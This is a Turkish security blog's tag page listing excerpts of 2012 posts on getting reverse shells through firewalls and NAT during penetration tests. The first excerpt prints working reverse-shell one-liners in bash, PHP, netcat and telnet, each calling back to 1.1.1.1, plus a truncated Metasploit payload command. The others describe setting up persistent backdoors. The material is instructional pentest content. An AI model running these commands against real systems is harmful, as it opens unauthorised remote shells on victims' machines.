reverse shell Etiketli Yazılar

BGA Blog yazıları

Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri
2012

Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri

"Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri" konulu blog girdisinde, NAT arkasındaki sistemlere erişim mantığı ve örnek netcat uygulaması yer alıyor. Bu yazıda, farklı durumlarda pratik olarak reverse shell alma teknikleri bulunuyor;Not: Dinleme modunda "nc -lvp 443" komutu kullanılabilir.BASHbash -i >& /dev/tcp/1.1.1.1/443 0>&1  (Red hat tabanlı sistemler için)PHPphp -r '$sock=fsockopen("1.1.1.1",443);exec("/bin/sh -i <&3 >&3 2>&3");'Netcatnc -e /bin/sh 1.1.1.1 443Telnettelnet 1.1.1.1 4444 | /bin/bash | telnet 1.1.1.1 443Windows Reverse Shell (metasploit)#msfpayload windows/shell/reverse_tcp LHOST=1.1.1.1…
Devamı
Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri
2012

Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri

Gerçek penetrasyon testlerinde ana amaçlardan biri hedef sistemde kalıcı olarak komut çalıştırabilecek şekilde arka kapılar oluşturmaktır . Hedef sistemin genellikle bir güvenlik duvarı arkasında olacağı düşünülürse uzaktan port açılamayacağı için reverse shell olarak tabir edilen tersine bağlantı yöntemi kullanılır. Bu yöntem eğer pentester NAT yapan bir Firewall/modem arkasında ise biraz zorlu olmaktadır. NAT arkasında revershe shell almak isteyen biri için temelde iki yöntem vardır. Bunlar: Firewall/Modemin PAT(Port Address Translation)özelliğini kullanarak gerçek ip…
Devamı
Firewall/NAT Korumalı Sistemleri Dış Dünyaya Açma
2012

Firewall/NAT Korumalı Sistemleri Dış Dünyaya Açma

NAT/Router/Firewall arkasındaki bir sistem dış dünyaya tamamen kapalıdır. Dışardan yalnızca izin verilen portlara bağlantı  kurulabilir. Pentest çalışmalarında, hedef network'den ele geçirdiğiniz bir sistemi dış dünyaya açmak (rdp,vnc,ssh vb.) diğer pentest ekibi ile paylaşmanız gerektiğinde kullanabileceğiniz teknikler kısıtlıdır. Firewall atlatmak, ters bağlantı methodu destekleyen yazılım bulmak ciddi maliyettir.Bu tür senaryolarda, Nat/Router/Firewall bypass etmek ve dış dünyadan (wan) gelen trafiği iç ağa yönlendirmek için ters bağlantı tekniği kullanılır ve bunu yapacak gelişmiş bir ajana ihtiyaç…
Devamı